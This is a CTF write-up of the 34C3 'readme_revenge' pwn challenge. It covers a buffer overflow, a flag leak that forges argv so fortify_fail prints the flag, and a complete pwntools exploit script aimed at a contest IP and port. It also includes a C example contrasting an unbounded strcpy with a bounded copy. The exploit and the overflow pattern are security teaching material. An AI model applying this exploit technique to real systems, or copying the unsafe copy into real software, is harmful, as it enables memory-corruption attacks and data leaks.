34C3 CTF Pwn Readme-revenge Write-up

Introduction

I failed to solve this challenge during the contest. There is a simple buffer overflow vulnerability in the challenge that allows control flow hijacking, but I spent a lot of time searching for ROP gadgets in the binary. After reading [1], I realized I had been too naive.

Vulnerability Analysis

There is a buffer overflow vulnerability in the challenge. After sending a long sequence of “A” characters and some testing, we get a crash at the site shown below.
[Screenshot: crash site]
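As an added illustration (constructed for this write-up, not the challenge's own source, which is not reproduced here), the bug class behind a crash like this one, an unbounded copy into a fixed-size buffer, next to the bounded form that rejects oversized input instead of overwriting whatever follows the buffer:

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 64

/* Bug class behind the crash above, as a constructed illustration (the
 * challenge's own source is not reproduced in this write-up): an unbounded
 * copy into a fixed-size buffer. Input longer than NAME_LEN - 1 bytes
 * overwrites whatever follows the buffer in memory. Defined for reference
 * only; nothing below calls it. */
void greet_unsafe(const char *input) {
    char name[NAME_LEN];
    strcpy(name, input);   /* no length check */
    printf("Hello, %s\n", name);
}

/* Bounded replacement: copies at most out_len - 1 bytes and always
 * NUL-terminates. Returns 1 when the whole input fit, 0 when it was
 * truncated (or out_len is 0), so the caller can reject oversized input
 * instead of silently continuing with a mangled value. */
int copy_bounded(const char *input, char *out, size_t out_len) {
    size_t n = strlen(input);
    if (out_len == 0)
        return 0;
    if (n >= out_len) {
        memcpy(out, input, out_len - 1);
        out[out_len - 1] = '\0';
        return 0;
    }
    memcpy(out, input, n + 1);   /* includes the terminating NUL */
    return 1;
}

/* Reads one line from stdin with a hard bound instead of an open-ended
 * read, then copies it through the checked helper. */
int main(void) {
    char line[256];
    char name[NAME_LEN];
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    line[strcspn(line, "\n")] = '\0';
    if (!copy_bounded(line, name, sizeof name)) {
        fprintf(stderr, "input too long (max %d bytes)\n", NAME_LEN - 1);
        return 1;
    }
    printf("Hello, %s\n", name);
    return 0;
}
```

The point of the return value is that truncation is reported rather than hidden: a service that silently truncates still accepts attacker-shaped input, while one that rejects it gives you a log line to alert on.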

Exploitation Plan

From the analysis above, I know that I can hijack control flow. But I focused on searching for ROP gadgets to pwn a shell and failed to consider other possibilities.
The flag is actually located at 0x6b4040. Therefore we just need to print the string located at 0x6b4040.
After searching through the other global values that can be overwritten, we can use the fortify_fail function to do this by forging an argv variable in memory: fortify_fail prints argv[0] as part of its error message, so a fake argv whose first entry points at 0x6b4040 makes it print the flag.
[Screenshot omitted]

Exploitation

from pwn import *
import sys

# Usage: python exploit.py <mode>
#   0 = remote target, 1 = local process, 2 = local process under gdb
DEBUG = int(sys.argv[1])

if DEBUG == 0:
    r = remote("35.198.130.245", 1337)
elif DEBUG == 1:
    r = process("./readme")
elif DEBUG == 2:
    r = process("./readme")
    gdb.attach(r, '''source script''')

def halt():
    # Log everything the target sends until it closes the connection
    try:
        while True:
            log.info(r.recvline())
    except EOFError:
        pass


fortifyFail = 0x4359e0            # unused; kept from the original script
flagAddr = 0x6b4040               # address of the flag string
fakeArgc = 1                      # 0x6b7978
fakeArgv = 0x6b7a10               # 0x6b7980, forged argv whose [0] points at the flag
fakeFunctionTable = 0x434343434343
fakeArginfoTable = 0x6b7a20 - 0x73*8
fortifyFailAddr = 0x4359d0        # fortify_fail, prints argv[0] in its error message


def exploit():
    # Padding up to the first overwritten global, then the forged argc/argv
    payload = p64(0x424242424242)*179
    payload += p64(fakeArgc) + p64(fakeArgv)

    # Remaining globals, including the forged argv contents and the
    # pointers that route execution into fortify_fail
    payload += p64(0)*17 + p64(flagAddr) + p64(0)
    payload += p64(fortifyFailAddr) + p64(fakeFunctionTable)
    payload += p64(0)*15 + p64(fakeArginfoTable)
    r.sendline(payload)
    halt()

exploit()

Conclusion

It’s a good lesson for CTF challenges. CTF pwn is not just about heap exploitation and pwning a shell. When you hit a dead end, consider other possibilities.

Reference

[1] https://gist.github.com/romanking98/8d0bb360a9563694d1d71f6a8cce3c3f
